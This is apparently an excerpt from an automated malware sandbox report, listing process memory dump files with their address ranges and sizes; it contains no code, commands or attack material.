                                                                                • memory/3348-772-0x0000000074B90000-0x0000000074B9A000-memory.dmp

                                                                                  Filesize

                                                                                  40KB

                                                                                • memory/3396-698-0x000001BDCF880000-0x000001BDCF881000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/3396-700-0x000001BDCF880000-0x000001BDCF881000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/3396-704-0x000001BDCF880000-0x000001BDCF881000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/3396-703-0x000001BDCF880000-0x000001BDCF881000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/3396-702-0x000001BDCF880000-0x000001BDCF881000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/3396-701-0x000001BDCF880000-0x000001BDCF881000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/3396-693-0x000001BDCF880000-0x000001BDCF881000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/3396-694-0x000001BDCF880000-0x000001BDCF881000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/3396-699-0x000001BDCF880000-0x000001BDCF881000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/3396-692-0x000001BDCF880000-0x000001BDCF881000-memory.dmp

                                                                                  Filesize

                                                                                  4KB

                                                                                • memory/3484-672-0x0000000004FA0000-0x0000000004FAA000-memory.dmp

                                                                                  Filesize

                                                                                  40KB

                                                                                • memory/3484-673-0x0000000074AF0000-0x0000000074AFA000-memory.dmp

                                                                                  Filesize

                                                                                  40KB

                                                                                • memory/3756-712-0x00000000003F0000-0x0000000000452000-memory.dmp

                                                                                  Filesize

                                                                                  392KB

                                                                                • memory/3756-713-0x0000000005350000-0x00000000058F6000-memory.dmp

                                                                                  Filesize

                                                                                  5.6MB

                                                                                • memory/5064-722-0x00000000055E0000-0x00000000055EA000-memory.dmp

                                                                                  Filesize

                                                                                  40KB

                                                                                • memory/5064-723-0x0000000074B90000-0x0000000074B9A000-memory.dmp

                                                                                  Filesize

                                                                                  40KB

                                                                                • memory/5960-690-0x0000000007D40000-0x00000000083BA000-memory.dmp

                                                                                  Filesize

                                                                                  6.5MB

                                                                                • memory/5960-688-0x00000000066D0000-0x00000000066EE000-memory.dmp

                                                                                  Filesize

                                                                                  120KB

                                                                                • memory/5960-687-0x0000000006190000-0x00000000064E7000-memory.dmp

                                                                                  Filesize

                                                                                  3.3MB

                                                                                • memory/5960-678-0x0000000006060000-0x00000000060C6000-memory.dmp

                                                                                  Filesize

                                                                                  408KB

                                                                                • memory/5960-677-0x00000000058C0000-0x0000000005926000-memory.dmp

                                                                                  Filesize

                                                                                  408KB

                                                                                • memory/5960-676-0x0000000005820000-0x0000000005842000-memory.dmp

                                                                                  Filesize

                                                                                  136KB

                                                                                • memory/5960-675-0x0000000005930000-0x0000000005F5A000-memory.dmp

                                                                                  Filesize

                                                                                  6.2MB

                                                                                • memory/5960-674-0x0000000003200000-0x0000000003236000-memory.dmp

                                                                                  Filesize

                                                                                  216KB

                                                                                • memory/5960-689-0x0000000006760000-0x00000000067AC000-memory.dmp

                                                                                  Filesize

                                                                                  304KB

                                                                                • memory/5960-691-0x0000000006BE0000-0x0000000006BFA000-memory.dmp

                                                                                  Filesize

                                                                                  104KB